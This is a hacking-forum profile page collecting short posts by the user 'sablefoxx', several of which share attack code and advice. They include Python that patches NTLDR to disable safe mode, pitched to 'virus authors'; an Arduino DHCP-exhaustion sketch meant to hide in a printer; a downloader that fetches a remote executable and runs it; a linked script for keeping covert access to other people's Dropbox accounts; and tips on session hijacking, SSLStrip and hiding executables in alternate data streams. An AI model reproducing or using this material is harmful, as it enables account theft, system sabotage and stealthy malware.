Jump to content


Dedicated Members
  • Content Count

  • Joined

  • Last visited

  • Days Won


About sablefoxx

  • Rank
    Hak5 Ninja
  • Birthday 01/01/1911

Contact Methods

  • Website URL
  • ICQ

Profile Information

  • Gender
  • Location
    /Milkyway/Terran System/Earth/
  • Interests
    Greatest Albums:<br />-----------------------------------------------------<br />The Dark Side of the Moon - Pink Floyd<br />Give Up - The Postal Service<br />The Classics - Ratatat<br />-----------------------------------------------------

Recent Profile Visitors

23,297 profile views
  1. @ibegreengoblin -- I sent you a PM, I'd also recommend modifying your post here to be a little less incriminating.
  2. sablefoxx


    Glad to see the project is moving forward. May I humbly suggest adding this little script I wrote recently. Allows you to copy other people's dropbox accounts and maintain access to them even if they change their password. Perfect for flash drives/switchblades! http://ge.tt/8nETsM5?c And if you're feeling a bit evil, disable safe mode (XP/2k3): # Python 2.x Code import os import mmap def patchNtldr(ntldr = 'C:\\ntldr'): file = open(ntldr, 'r+') size = os.path.getsize(ntldr) map = mmap.mmap(file.fileno(), size) map.seek(1915) # Jump to offset map.write_byte
  3. Meterpreter is good at this. -- http://lmgtfy.com/?q=meterpreter+tutorial
  4. Yeah that doesn't seem like a very mean virus. You can prbly just boot into safe mode and modify the Group Policies or regkeys to re-gain access. On a side note to virus authors don't forget to disable safe mode by patching the NTLDR like so: # Python 2.x Code import os import mmap def patchNtldr(ntldr = 'C:\\ntldr'): file = open(ntldr, 'r+') size = os.path.getsize(ntldr) map = mmap.mmap(file.fileno(), size) map.seek(1915) # Jump to offset map.write_byte('\x90') # NOP Sled, whee! map.write_byte('\x90') map.write_byte('\x90') map.close() if __na
  5. DHCP attacks are fun, I recently wrote a Arduino sketch to preform DHCP Exhaustion attacks on (ethernet) networks. Thinking about hiding in a network printer or something. /*** * Net~nade: The hand held DHCP grenade (exhaustion attack) * Written by: Sablefoxx */ #include &lt;Ethernet.h&gt; #include &lt;EthernetDHCP.h&gt; /* Function Prototypes */ void requestIp(byte); void displayMac(byte); const char* addressToString(const uint8_t* ip); /* Setup */ void setup() { Serial.begin(9600); } /* Main Loop */ void loop() { byte mac[6] = {0xDE, 0xAD, 0xBE, 0xEF, 0x01
  6. You shouldn't make system calls if possible (they're evil), it's actually easy to download files in pure python. Heres a quick example; import urllib from subprocess import Popen path = 'C:\\file.exe' # Local path url = 'http://remote-server.com/file.exe' # Remote path connection = urllib.urlopen(url) remoteFile = connection.read() connection.close() try: localFile = open(path, 'w') localFile.write(remoteFile) localFile.close() Popen(path) # Execute whatever "path" points to except IOError: print '***** OMFG ERROR: Location is not writable %
  7. sablefoxx


    I haven't had much time to develop Py~Blade recently so here is the current source code, it's got a few bugs but feel free to hack it up. This isn't an official release but feel free to post patches, or any cool modifications you guys make. I'll get around to writing some more stuff in the summer (hopefully). (Go forth and learn python! http://docs.python.org) http://dl.dropbox.com/u/341940/pyblade.tar.gz
  8. http://www.instructables.com/id/Remove-U3-from-flash-drive/
  9. sablefoxx


    Note: a lot of the time even when the credentials are sent over HTTPS the cookie is still sent in clear text, so you can still use session hijacking. This is why this type of attack is effective, even if you can't get the user/password you can still gain access to an account.
  10. sablefoxx


    If you could write an exploit to do this you'd already have code running on the machine, which would make it pointless to disable HTTPS because you already owned the box, just hook the encryption dll.
  11. sablefoxx


    1. Facebook sends the cookie in clear-text even if you login via SSL. 2. Gmail is now only done over SSL, no custom settings required, which mitigates this attack somewhat (certain other Google apps are not done over SSL though), but you can just use SSLStrip get around that Also look into using Hamster/Ferret it can attack all sites and not just a predefined list (and almost as easy to use)
  12. sablefoxx


    I'm hoping not to have to use AV-Kill and instead just hide everything. Killing process is messy and loud and I'd rather focus on stealth. I'm currently looking into hiding executable files in alternate data streams. For those of you who aren't familiar with alternate data streams they work like so; E:\&gt;touch test.txt E:\&gt;echo hello world &gt;&gt; test.txt E:\&gt;cat test.txt hello world E:\&gt;dir test.txt Volume in drive E is RAID_ARRAY Volume Serial Number is 0000-0000 Directory of E:\ 10/20/2010 10:35 AM 14 test.txt
  13. sablefoxx


    (Sorry about the long update interval recently moved 1,784 miles to attend college) Lots of new features in the upcoming build, plus made the code a lot more modular so it will be easier for kids to play with. No AV kill in the new build at this time, but I will look into the Metasploit kill scripts, thx for the tip.
  • Create New...